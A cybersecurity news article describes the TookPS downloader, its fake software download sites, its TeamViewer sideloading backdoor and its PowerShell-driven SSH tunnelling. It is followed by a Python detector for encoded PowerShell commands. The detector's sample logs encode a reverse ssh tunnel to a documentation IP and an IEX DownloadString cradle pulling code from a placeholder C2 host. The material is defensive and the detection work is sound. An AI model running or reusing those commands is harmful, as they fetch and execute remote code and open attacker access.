In early March 2025, researchers identified malicious operations using DeepSeek as bait, but subsequent telemetry analysis has revealed that the TookPS downloader targets users through multiple vectors, including fraudulent websites that mimic official download pages for remote desktop applications and 3D modeling software. Further analysis shows the malware deploys modified versions of known backdoors, including a variant of Backdoor.Win32.TeviRat that uses DLL sideloading against the TeamViewer remote access software, letting attackers keep persistent access while staying hidden from users.

Securelist researchers found that once TookPS is on a victim's device, it establishes communication with command and control servers using domains registered in early 2024. Through this tunnel, attackers gain full system access, allowing arbitrary command execution and complete compromise of the victim's environment. Additional monitoring has detected malicious executables disguised as popular software, including the Ableton music production suite and the Quicken financial management application, indicating that the threat actors are casting a wide net to maximize infections.

After initial infection, TookPS contacts its command servers to download a series of three PowerShell scripts that systematically compromise the target system. Different samples communicate with different C2 domains, retrieving base64-encoded PowerShell scripts that give the attackers persistent access to the compromised host. The retrieved command starts an SSH server that creates a tunnel between the infected device and the remote server controlled by the attackers.
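The chain described above (base64-encoded PowerShell fetched from C2, then an SSH tunnel back to the attacker's server) leaves traces in process-creation telemetry that a defender can hunt for. The following is an added example and not code from Securelist or this article: it decodes PowerShell `-EncodedCommand` payloads found in sample log lines and flags SSH-tunnel and download-cradle indicators. The log lines, hostnames and IP addresses are constructed, and the indicator patterns are assumptions about what such scripts look like, not signatures taken from the TookPS samples.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# PowerShell's -EncodedCommand (aliases -e, -ec, -enc) carries base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Assumed indicators for the behaviour reported above; not vendor signatures.
SUSPICIOUS = [
    ("ssh reverse tunnel", re.compile(r"(?i)\bssh(?:\.exe)?\b.*\s-R\s")),  # ssh -R <port>:...
    ("sshd started", re.compile(r"(?i)\bsshd(?:\.exe)?\b")),
    ("download cradle", re.compile(r"(?i)\b(?:DownloadString|Invoke-WebRequest|iwr)\b")),
]


def decode_encoded_command(token: str) -> Optional[str]:
    """Return the decoded script, or None if the token is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyse_command_line(cmdline: str) -> List[str]:
    """Return a list of finding labels for one process command line (empty if clean)."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return []
    script = decode_encoded_command(match.group(1))
    if script is None:
        return ["undecodable encoded command"]
    findings = ["encoded powershell"]
    findings.extend(label for label, pat in SUSPICIOUS if pat.search(script))
    return findings


def scan_logs(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (line index, findings) for every log line that produced findings."""
    results = []
    for idx, line in enumerate(lines):
        found = analyse_command_line(line)
        if found:
            results.append((idx, found))
    return results


def encode_ps(script: str) -> str:
    """Helper used only to build the constructed sample logs below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation records (not real telemetry).
SAMPLE_LOGS = [
    "4688 host=ws01 parent=explorer.exe cmd=powershell.exe -NoProfile -Command Get-Date",
    "4688 host=ws01 parent=tookps-sample.exe cmd=powershell.exe -nop -w hidden -enc "
    + encode_ps('Start-Process ssh.exe -ArgumentList "-N -R 2222:127.0.0.1:3389 u@198.51.100.10"'),
    "4688 host=ws02 parent=tookps-sample.exe cmd=powershell.exe -EncodedCommand "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s1')"),
]
```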
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 03 Apr 2025 12:40:14 +0000